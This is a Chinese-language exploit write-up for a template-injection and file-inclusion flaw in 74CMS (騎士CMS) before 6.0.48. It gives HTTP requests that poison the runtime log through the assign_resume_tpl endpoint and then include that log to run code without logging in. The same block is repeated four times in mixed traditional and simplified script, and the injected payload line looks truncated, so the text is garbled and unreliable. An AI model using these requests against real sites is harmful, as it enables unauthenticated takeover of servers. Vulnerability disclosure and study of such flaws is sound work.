# 騎士CMS模版註入 &文件包含getshell漏洞/zh-cn
==漏洞描述==
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
==影響範圍==
騎士 CMS < 6.0.48
==漏洞利用==
使用火狐hackbar發送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=/r/n
可以看到日誌記錄。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
==漏洞描述==
骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
==影響範圍==
騎士 CMS < 6.0.48
==漏洞利用==
使用火狐hackbar發送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=/r/n
可以看到日誌記錄。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
==漏洞描述==
骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可以在无需登录的情况下执行任意代码,控制服务器。
==影响范围==
骑士 CMS < 6.0.48
==漏洞利用==
使用火狐hackbar发送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=/r/n
可以看到日志记录。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
==漏洞描述==
骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可以在无需登录的情况下执行任意代码,控制服务器。
==影响范围==
骑士 CMS < 6.0.48
==漏洞利用==
使用火狐hackbar发送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=/r/n
可以看到日志记录。
包含这条日志,注意路径和日志名称:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
